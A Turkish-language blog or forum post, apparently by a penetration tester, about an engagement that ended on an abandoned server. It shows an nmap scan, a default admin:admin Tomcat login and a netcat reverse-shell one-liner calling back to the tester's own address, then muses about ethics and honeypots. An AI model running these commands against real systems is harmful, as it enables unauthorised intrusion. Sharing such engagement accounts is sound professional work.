Etik Hackingte Garip Bir Sessizlik
Selam dostlar,
Bu yazı hem teknik bir anı hem de zihinsel bir soru işareti olarak okunabilir. Aramızda tecrübeli profesyoneller de var, yeni başlayanlar da… Hepimize bir şeyler düşündürmesi dileğiyle.
Geçtiğimiz günlerde çıktığım bir pentest sürecinde yaşadığım oldukça ilginç bir durumu paylaşmak istiyorum. Her şey prosedüre uygun ve sıradandı ta ki içeriden gelen o "garip sessizlik"le karşılaşana kadar.
Çünkü bazen bir sistemin konuşmaması, her şeyden daha çok şey anlatır.
Aşama 1: Rutinmiş Gibi Başlayan Blackbox
Bash:
nmap -sS -T4 -Pn -p- <hedef_ip> --open -oN fullscan.txtTarama sonucunda açığa çıkan portlar klasik bir tabloyu sergiliyordu:
Kod:
21, 22, 80, 8080, 3306Eski bir Apache Tomcat Web Arayüzü. Deneme yanılmayla:
Kod:
admin:admin ➝ ✔️ Giriş Başarılı
Aşama 2: Komut Enjeksiyonu ve Shell Denemesi
Aşama 2: Komut Enjeksiyonu ve Shell DenemesiSistem üzerinde basit ağ komutları ile çalıştırma yetkisi olduğunu doğruladım:
Bash:
ping -c 1 8.8.8.8
traceroute 1.1.1.1Ardından klasik bir bash + netcat reverse shell ile konuyu bir adım ileri taşıdım:
Bash:
rm /tmp/s; mkfifo /tmp/s; cat /tmp/s | /bin/sh -i 2>&1 | nc <kendi_ip> 4444 > /tmp/s
nc -lvnp 4444
Bağlantı Kuruldu: Inside the System
Bağlantı Kuruldu: Inside the SystemShell açıldı. İlk kontrol:
Bash:
whoami ➝ apache
hostname ➝ devops-node-old
id ➝ uid=48(apache) gid=48(apache)
Tuhaflık Burada Başladı: Sessizlik
Tuhaflık Burada Başladı: Sessizliktop çıktısında CPU ya da RAM’e dair neredeyse sıfıra yakın bir kullanım vardı:
Bash:
top - 01:52:33 up 316 days, 1 user, load average: 0.00, 0.01, 0.05Uptimelı eski bir sunucu. 316 gündür reboot edilmemiş.
Dizin yapısı da sistemin uzun süredir terk edildiğine işaret gibiydi:
Bash:
cd /srv/ ➝ boş
cd /opt/ ➝ legacy_monitor/Log dizinleri ya boştu ya da daha önce silinmişti. İzleme servisi yoktu.
Ve O Soru: “Ben Burada Ne Arıyorum?”
Ve O Soru: “Ben Burada Ne Arıyorum?”Sistem ya bir zamanlar aktifti ve terk edilmişti…
Ya da tam tersi: Aktif görünümlü, ama iz bırakmayan bir tuzaktı.
O anda hissettiğim şey, teknikten çok daha farklıydı.
Sanki içerisi dijital bir mezarlık gibiydi. Shell açıktı, ama orada kimse yaşamıyordu.
Etik Hacking mi, Dijital Arkeoloji mi?
Etik Hacking mi, Dijital Arkeoloji mi?Müşteriye şu şekilde geri bildirim sundum:
Bir açık yakalamıştım ama içeri girdiğimde orası çoktan terk edilmişti.
Bu da bana şu soruları sordurdu:
Tartışmaya Açık Sorular
Tartışmaya Açık Sorular
- Reverse shell geldi ama içeride hiçbir şey yoksa, ne kadar ileri gitmeli?
- Boş sistem her zaman zararsız mıdır, yoksa honeypot olabilir mi?
- Merak ile etik sınır arasındaki çizgi nerede başlar?
- Siz olsaydınız nasıl bir yol izlerdiniz?
Son Söz
Son SözBu iş bazen sade bir root shell'den ibaret olmaz.
Bazen bir pentest, sibernetik bir iz sürme gezisine, bir varlık-yokluk sorgusuna dönüşebilir.
Eğer içeri giriyorsan…
Hazır ol: Bazen içeride kimse yoktur.
Bazen bir pentest, sibernetik bir iz sürme gezisine, bir varlık-yokluk sorgusuna dönüşebilir.
Eğer içeri giriyorsan…
Hazır ol: Bazen içeride kimse yoktur.
Richard Jackson
“R.j” – | Est. 2018
Not: Bu yazı, birebir yaşanmış ve şahsıma ait bir pentest deneyimini anlatmaktadır.
Gerçek komut dizileri, sistem çıktıları ve gözlemler tarafımdan sahada elde edilmiştir.
Teknik içeriklerin bazıları etik gereği sadeleştirilmiş ya da anonimleştirilmiştir.
Not: Bu yazı, birebir yaşanmış ve şahsıma ait bir pentest deneyimini anlatmaktadır.Gerçek komut dizileri, sistem çıktıları ve gözlemler tarafımdan sahada elde edilmiştir.
Teknik içeriklerin bazıları etik gereği sadeleştirilmiş ya da anonimleştirilmiştir.
